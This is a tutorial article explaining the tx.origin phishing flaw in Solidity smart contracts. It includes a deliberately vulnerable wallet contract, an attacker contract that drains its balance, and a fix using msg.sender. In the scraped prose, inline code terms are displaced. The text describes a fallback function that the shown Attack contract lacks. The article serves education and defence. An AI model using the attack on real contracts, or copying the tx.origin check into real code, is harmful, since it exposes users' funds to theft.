is a global variable in Solidity which returns the address of the account that sent the transaction. Contracts that use the to authorize users are vulnerable to phishing attacks. tx.origin tx.origin How? Let’s say a call could be made to the vulnerable contract that passes the authorization check since returns the original sender of the transaction which in this case is the authorized account. tx.origin Let's look at the example. contract Wallet {
    address public owner;

    constructor() payable {
        owner = msg.sender;
    }

    function transfer(address payable _to, uint _amount) public {
        require(tx.origin == owner);

        (bool sent, ) = _to.call{value: _amount}("");
        require(sent, "Failed to send Ether");
    }
}

contract Attack {
    address payable public owner;
    Wallet wallet;

    constructor(Wallet _wallet) {
        wallet = Wallet(_wallet);
        owner = payable(msg.sender);
    }

    function attack() public {
        wallet.transfer(owner, address(wallet).balance);
    }
} I created two contracts: that stores and withdraws funds, and which is a contract made by an attacker who wants to attack the first contract. Wallet Attack Note that the contract authorizes the function using . transfer tx.origin Now, if the owner of the contract sends a transaction with enough gas to the address, it will invoke the fallback function, which in turn calls the function of the contract with the parameter attacker. Wallet Attack transfer Wallet As a result, all funds from the contract will be withdrawn to the attacker's address. This is because the address that first initialized the call was the victim (i.e., the owner of the contract). Wallet Wallet Therefore, will be equal to the owner and the on will pass. tx.origin require How to prevent Tx Origin attacks The best way to prevent Tx Origin attacks is not to use the for authentication purposes. Instead, it is advisable to use (see below) tx.origin msg.sender function transfer(address payable _to, uint256 _amount) public {
  require(msg.sender == owner);

  (bool sent, ) = _to.call.value(_amount)("");
  require(sent, "Failed to send Ether");
} Sources: https://solidity-by-example.org/hacks/phishing-with-tx-origin/ https://medium.com/coinmonks/solidity-tx-origin-attacks-58211ad95514 https://blog.sigmaprime.io/solidity-security.html#tx-origin Also published . here

Hack Solidity: Reentrancy Attack

How To Create a Mapping in Solidity

Do not forget to follow me 

Nominated for 2022 - HackerNoon Contributor of the Year - Ethereum

Nominated for 2022 - HackerNoon Contributor of the Year - Smart Contracts

Nominated for 2022 - HackerNoon Contributor of the Year - Solidity

Nominated for 2022 - Software Developer of the Year

Nominated for 2022 - HackerNoon Contributor of the Year - Programming

Nominated for 2022 - HackerNoon Contributor of the Year - Security

Too Long; Didn't Read

Hacking Solidity: Contracts Using tx.origin for Authorization Are Vulnerable To Phishing

Hacking Solidity: Contracts Using tx.origin for Authorization Are Vulnerable To Phishing

About Author

Comments

TOPICS

THIS ARTICLE WAS FEATURED IN

Related Stories

Hack Solidity: Integer Overflow and Underflow

$2M Backing and a Vision: How GAM3S.GG is Reshaping Web3 Gaming

$1M Hackathon Prizes Announced By MultiversX to Expand the Blockchain Ecosystem

Windows Sticky Keys Exploit: The War Veteran That Never Dies

$PEPE, a Purple Lamborghini, and More: The Story Continues

0xMahjong NFT to Begin Free Minting - Mahjong Meta Game Expects Over $10 Million In Funding

Hack Solidity: Integer Overflow and Underflow

$2M Backing and a Vision: How GAM3S.GG is Reshaping Web3 Gaming

$1M Hackathon Prizes Announced By MultiversX to Expand the Blockchain Ecosystem

Windows Sticky Keys Exploit: The War Veteran That Never Dies

$PEPE, a Purple Lamborghini, and More: The Story Continues

0xMahjong NFT to Begin Free Minting - Mahjong Meta Game Expects Over $10 Million In Funding

Light-Mode

Classic

Newspaper

Minty

Dark-Mode

Neon Noir

Minty

HN StartUps